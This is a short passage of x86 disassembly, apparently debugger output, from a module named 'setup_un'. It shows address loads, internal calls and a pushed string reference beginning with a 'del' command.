00407CFF  |.  8D85 30FEFFFF LEA EAX,DWORD PTR SS:[EBP-1D0]
00407D05  |.  E8 56C5FFFF CALL setup_un.00404260
00407D0A  |.  E8 19B4FFFF CALL setup_un.00403128
00407D0F  |.  E8 00A9FFFF CALL setup_un.00402614
00407D14  |.  68 707F4000 PUSH setup_un.00407F70                ;  del "
00407D19  |.  8D95 20FEFFFF LEA EDX,DWORD PTR SS:[EBP-1E0]
00407D1F  |.  33C0       XOR EAX,EAX
00407D21  |.  E8 56AAFFFF CALL setup_un.0040277C
00407D26  |.  FFB5 20FEFFFF PUSH DWORD PTR SS:[EBP-1E0]
0040